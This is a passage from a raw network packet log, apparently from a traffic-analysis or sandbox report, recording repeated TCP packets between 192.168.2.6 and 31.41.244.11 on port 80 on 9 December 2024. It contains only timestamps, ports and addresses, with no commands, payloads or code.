                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.181355953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.181406021 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.182121038 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.182168961 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.182231903 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.182274103 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183060884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183105946 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183109045 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183147907 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183916092 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.183964968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184015989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184066057 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184736013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184793949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184799910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.184838057 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.185676098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.185698032 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.185736895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.185759068 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.186485052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.186506987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.186536074 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.186557055 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.187356949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.187410116 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.187468052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.187517881 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.188237906 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.188308954 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.188340902 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.188390017 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189090967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189173937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189258099 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189305067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189923048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.189960957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190047026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190085888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190872908 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190927982 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190948009 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.190993071 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.191740990 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.191800117 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.191827059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.191875935 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.192538023 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.192598104 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.192676067 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.192725897 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.193414927 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.193474054 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.193629980 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.193675995 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.194279909 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.194336891 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.194351912 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.194391966 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.195153952 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.195214033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.195285082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.195331097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196021080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196079016 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196111917 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196156979 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196887970 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.196944952 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.197040081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.197089911 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.197766066 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.197822094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198091030 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198149920 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198685884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198751926 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198793888 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.198863983 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.199546099 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.199592113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.199635983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.199681997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.200390100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.200437069 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.200541019 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.200579882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.201219082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.201258898 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.201497078 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.201558113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.202131987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.202172041 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.202198029 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.202234030 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.202976942 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203020096 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203090906 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203131914 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203818083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203866005 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203918934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.203953028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.204710007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.204751015 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.204812050 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.204850912 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.205564022 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.205606937 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.205678940 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.205718994 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.206419945 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.206461906 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.206521988 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.206562996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.207309961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.207367897 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.207431078 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.207468987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.208142996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.208194017 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.208306074 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.208365917 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209141016 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209186077 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209306955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209348917 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209870100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209906101 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209923983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.209963083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.357559919 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.357620001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.357682943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.357729912 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.357960939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358001947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358206034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358248949 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358804941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358818054 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.358855963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.359635115 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.359684944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.359795094 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.359846115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.360555887 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.360609055 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.360716105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.360757113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.361402035 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.361449957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.361476898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.361520052 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.362231016 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.362281084 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.362313986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.362361908 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.363156080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.363207102 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.363274097 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.363323927 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364012957 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364039898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364056110 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364083052 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364836931 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.364886999 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365019083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365067005 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365684986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365741014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365799904 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.365842104 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.366571903 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.366620064 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.366683006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.366724968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.367440939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.367490053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.367594004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.367638111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.368304968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.368442059 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.368468046 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.368511915 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.369219065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.369266987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.369395971 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.369440079 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.370106936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.370150089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.370173931 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.370219946 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371021986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371066093 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371150017 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371191978 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371812105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371857882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.371944904 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.372001886 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.372669935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.372718096 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.372783899 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.372859955 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.373538971 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.373588085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.373641968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.373693943 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.374411106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.374464989 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.374618053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.374674082 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.375317097 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.375361919 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.375421047 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.375464916 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.376151085 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.376199007 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.376283884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.376323938 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377054930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377113104 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377119064 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377161026 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377883911 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377928972 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.377985954 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.378032923 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.378774881 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.378823996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.378854036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.378894091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.379637003 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.379686117 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.379803896 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.379854918 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.380467892 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.380517006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.380568027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.380615950 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.381362915 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.381406069 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.381436110 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.381477118 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.382241964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.382286072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.382538080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.382584095 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383079052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383119106 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383299112 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383342028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383936882 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.383985043 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.384188890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.384234905 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.384835005 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.384848118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.384893894 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.385688066 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.385735989 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.385762930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.385803938 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.386620998 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.386668921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.386698961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.386745930 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.387506008 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.387553930 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.387650967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.387701035 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.388302088 CET804987431.41.244.11192.168.2.6
